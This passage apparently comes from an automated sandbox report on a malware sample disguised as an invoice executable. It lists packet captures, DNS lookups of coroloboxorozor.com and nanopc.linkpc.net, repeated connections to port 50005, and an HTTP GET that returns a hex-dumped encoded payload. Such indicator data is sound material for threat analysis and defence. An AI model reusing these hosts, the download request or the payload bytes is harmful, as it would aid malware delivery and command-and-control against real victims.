                                                                                                              Feb 25, 2021 15:10:41.558933020 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558947086 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558960915 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558974028 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.558975935 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.558985949 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559010029 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559111118 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559169054 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559634924 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559688091 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559725046 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559741974 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559766054 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559797049 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559818029 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559830904 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559849024 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559865952 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559880972 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559887886 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559896946 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559916019 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559937954 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559957981 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559969902 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.559973955 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.559993982 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560013056 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560029984 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.560082912 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.560683012 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560728073 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560774088 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560791016 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560801029 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.560820103 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560837030 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.560849905 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560882092 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560897112 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.560899973 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560916901 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560929060 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560949087 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560966969 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.560970068 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.560998917 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561021090 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561029911 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.561038017 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561054945 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561062098 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.561115026 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.561523914 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561554909 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561593056 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561610937 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561626911 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561641932 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561644077 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.561665058 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561683893 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561707020 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.561754942 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.561754942 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561856985 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561872959 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561925888 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561939955 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.561959028 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.561983109 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.561991930 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562016964 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562041044 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562067986 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.562114954 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.562479019 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562515020 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562534094 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562567949 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562576056 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.562598944 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562628984 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562629938 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.562666893 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562690020 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.562689066 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562712908 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562727928 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562740088 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.562740088 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562756062 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562778950 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562784910 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.562797070 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562813044 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562828064 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.562865973 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.562922001 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.563509941 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563555002 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563590050 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563636065 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563661098 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563668013 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.563678980 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563692093 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.563699007 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563714981 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563734055 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563750029 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563770056 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563782930 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.563788891 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563807964 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563827991 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563839912 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.563847065 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563894033 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.563919067 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.563983917 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.564373016 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.564404011 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.564430952 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.564448118 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.564457893 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.564483881 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.564632893 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.677274942 CET4973050005192.168.2.4185.157.161.86
                                                                                                              Feb 25, 2021 15:10:47.677850008 CET4973050005192.168.2.4185.157.161.86
                                                                                                              Feb 25, 2021 15:10:53.636478901 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:53.636668921 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:53.715553045 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:53.768435001 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783530951 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783567905 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783591032 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783612967 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783633947 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783632040 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:53.783653021 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783665895 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783679962 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783688068 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:53.783703089 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783721924 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783737898 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:53.783744097 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783766985 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783787012 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783803940 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783821106 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:53.783823967 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783839941 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783854008 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:53.783858061 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:53.783875942 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:53.944124937 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:58.711769104 CET4973650005192.168.2.4185.157.161.86
                                                                                                              Feb 25, 2021 15:11:01.726043940 CET4973650005192.168.2.4185.157.161.86
                                                                                                              Feb 25, 2021 15:11:07.726385117 CET4973650005192.168.2.4185.157.161.86
                                                                                                              Feb 25, 2021 15:11:17.318209887 CET4974150005192.168.2.4185.157.161.86
                                                                                                              Feb 25, 2021 15:11:20.321224928 CET4974150005192.168.2.4185.157.161.86
                                                                                                              Feb 25, 2021 15:11:26.337419987 CET4974150005192.168.2.4185.157.161.86
                                                                                                              Feb 25, 2021 15:11:36.431376934 CET4974250005192.168.2.4157.97.120.21
                                                                                                              Feb 25, 2021 15:11:39.432327032 CET4974250005192.168.2.4157.97.120.21
                                                                                                              Feb 25, 2021 15:11:45.432724953 CET4974250005192.168.2.4157.97.120.21
                                                                                                              Feb 25, 2021 15:11:55.445944071 CET4974350005192.168.2.4157.97.120.21
                                                                                                              Feb 25, 2021 15:11:58.449584961 CET4974350005192.168.2.4157.97.120.21
                                                                                                              Feb 25, 2021 15:12:04.450218916 CET4974350005192.168.2.4157.97.120.21
                                                                                                              Feb 25, 2021 15:12:14.187495947 CET4974650005192.168.2.4157.97.120.21
                                                                                                              Feb 25, 2021 15:12:17.201152086 CET4974650005192.168.2.4157.97.120.21
                                                                                                              Feb 25, 2021 15:12:23.201699018 CET4974650005192.168.2.4157.97.120.21
                                                                                                              Feb 25, 2021 15:12:30.735937119 CET4974750005192.168.2.4185.157.161.86
                                                                                                              Feb 25, 2021 15:12:33.532774925 CET4972280192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:12:33.749924898 CET4974750005192.168.2.4185.157.161.86
                                                                                                              Feb 25, 2021 15:12:34.228888035 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:12:34.410134077 CET4973180192.168.2.4172.67.172.17

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Feb 25, 2021 15:09:50.541249990 CET5992053192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:50.595599890 CET53599208.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:09:51.337537050 CET5745853192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:51.397670031 CET53574588.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:09:52.336178064 CET5057953192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:52.384700060 CET53505798.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:09:53.281183958 CET5170353192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:53.334585905 CET53517038.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:09:54.745199919 CET6524853192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:54.795551062 CET53652488.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:09:58.368985891 CET5372353192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:59.361884117 CET5372353192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:09:59.421478033 CET53537238.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:23.339471102 CET6464653192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:23.388288021 CET53646468.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:24.923059940 CET6529853192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:24.971760988 CET53652988.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:25.973829985 CET5912353192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:26.025499105 CET53591238.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:26.946722984 CET5453153192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:26.998404980 CET53545318.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.087435007 CET4971453192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:28.136029005 CET53497148.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:28.233695984 CET5802853192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:28.292831898 CET53580288.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:32.579303026 CET5309753192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:33.779674053 CET5309753192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:34.786875010 CET5309753192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:34.837687016 CET53530978.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:40.718133926 CET4925753192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:40.775327921 CET53492578.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:43.487809896 CET6238953192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:43.541033030 CET53623898.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:44.845592976 CET4991053192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:44.897157907 CET53499108.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:45.931905031 CET5585453192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:45.993855000 CET53558548.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:10:46.421776056 CET6454953192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:10:46.470602036 CET53645498.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:11:03.485295057 CET6315353192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:11:03.539920092 CET53631538.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:11:04.660789967 CET5299153192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:11:04.718008041 CET53529918.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:11:05.936265945 CET5370053192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:11:05.987782001 CET53537008.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:11:14.144865036 CET5172653192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:11:14.193525076 CET53517268.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:11:36.266458988 CET5679453192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:11:36.427895069 CET53567948.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:11:55.282066107 CET5653453192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:11:55.443322897 CET53565348.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:12:07.356127024 CET5662753192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:12:07.404866934 CET53566278.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:12:09.698395014 CET5662153192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:12:09.747179985 CET53566218.8.8.8192.168.2.4
                                                                                                              Feb 25, 2021 15:12:14.123791933 CET6311653192.168.2.48.8.8.8
                                                                                                              Feb 25, 2021 15:12:14.186263084 CET53631168.8.8.8192.168.2.4

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Feb 25, 2021 15:09:58.368985891 CET192.168.2.48.8.8.80x395aStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:09:59.361884117 CET192.168.2.48.8.8.80x395aStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:10:28.233695984 CET192.168.2.48.8.8.80x20c9Standard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:10:40.718133926 CET192.168.2.48.8.8.80xc8cStandard query (0)coroloboxorozor.comA (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:11:36.266458988 CET192.168.2.48.8.8.80x582eStandard query (0)nanopc.linkpc.netA (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:11:55.282066107 CET192.168.2.48.8.8.80xc439Standard query (0)nanopc.linkpc.netA (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:12:14.123791933 CET192.168.2.48.8.8.80x36afStandard query (0)nanopc.linkpc.netA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Feb 25, 2021 15:09:59.421478033 CET8.8.8.8192.168.2.40x395aNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:09:59.421478033 CET8.8.8.8192.168.2.40x395aNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:10:28.292831898 CET8.8.8.8192.168.2.40x20c9No error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:10:28.292831898 CET8.8.8.8192.168.2.40x20c9No error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:10:40.775327921 CET8.8.8.8192.168.2.40xc8cNo error (0)coroloboxorozor.com172.67.172.17A (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:10:40.775327921 CET8.8.8.8192.168.2.40xc8cNo error (0)coroloboxorozor.com104.21.71.230A (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:11:36.427895069 CET8.8.8.8192.168.2.40x582eNo error (0)nanopc.linkpc.net157.97.120.21A (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:11:55.443322897 CET8.8.8.8192.168.2.40xc439No error (0)nanopc.linkpc.net157.97.120.21A (IP address)IN (0x0001)
                                                                                                              Feb 25, 2021 15:12:14.186263084 CET8.8.8.8192.168.2.40x36afNo error (0)nanopc.linkpc.net157.97.120.21A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • coroloboxorozor.com

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.449722172.67.172.1780C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 25, 2021 15:09:59.512818098 CET3777OUTGET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Feb 25, 2021 15:09:59.651695013 CET3779INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:09:59 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d874c778fd4511dc72e62286c184f05a41614262199; expires=Sat, 27-Mar-21 14:09:59 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              last-modified: Wed, 24 Feb 2021 19:31:15 GMT
                                                                                                              vary: Accept-Encoding
                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b1f7cfe0000c867daaee000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=j8IazhNMg77%2FDC1bDYDx8mGOoLFx0A8MoiG9INqFFjh926qrcn%2BnWB8Q3%2FSEGU%2FK4Rfw%2BkKDTgIPRwyGW2PVX7TmFpJdyQtqgFYQGPJxy66DwMnH"}],"max_age":604800}
                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627201db2e1fc867-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Data Raw: 36 64 35 64 0d 0a 3c 70 3e 7a 7a 53 51 4b 53 79 73 73 53 4b 53 43 53 4b 53 4b 53 4b 53 73 53 4b 53 4b 53 4b 53 4c 62 62 53 4c 62 62 53 4b 53 4b 53 79 4e 73 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 54 73 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 79 4c 4e 53 4b 53 4b 53 4b 53 79 73 53 43 79 53 79 4e 54 53 79 73 53 4b 53 79 4e 4b 53 51 53 4c 4b 62 53 43 43 53 79 4e 73 53 79 53 7a 54 53 4c 4b 62 53 43 43 53 4e 73 53 79 4b 73 53 79 4b 62 53 79 79 62 53 43 4c 53 79 79 4c 53 79 79 73 53 79 79 79 53 79 4b 43 53 79 79 73 53 51 7a 53 79 4b 51 53 43 4c 53 51 51 53 51 7a 53 79 79 4b 53 79 79 4b 53 79 79 79 53 79 79 54 53 43 4c 53 51 4e 53 79 4b 79 53 43 4c 53 79 79 73 53 79 79 7a 53 79 79 4b 53 43 4c 53 79 4b 62 53 79 79 4b 53 43 4c 53 54 4e 53 7a 51 53 4e 43 53 43 4c 53 79 4b 51 53 79 79 79 53 79 4b 4b 53 79 4b 79 53 73 54 53 79 43 53 79 43 53 79 4b 53 43 54 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4e 4b 53 54 51 53 4b 53 4b 53 7a 54 53 79 53 43 53 4b 53 7a 54 53 79 73 4c 53 73 79 53 79 4e 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4c 4c 73 53 4b 53 43 73 53 4b 53 79 79 53 79 53 4e 4b 53 4b 53 4b 53 79 4c 73 53 79 4b 53 4b 53 4b 53 54 53 4b 53 4b 53 4b 53 4b 53 4b 53
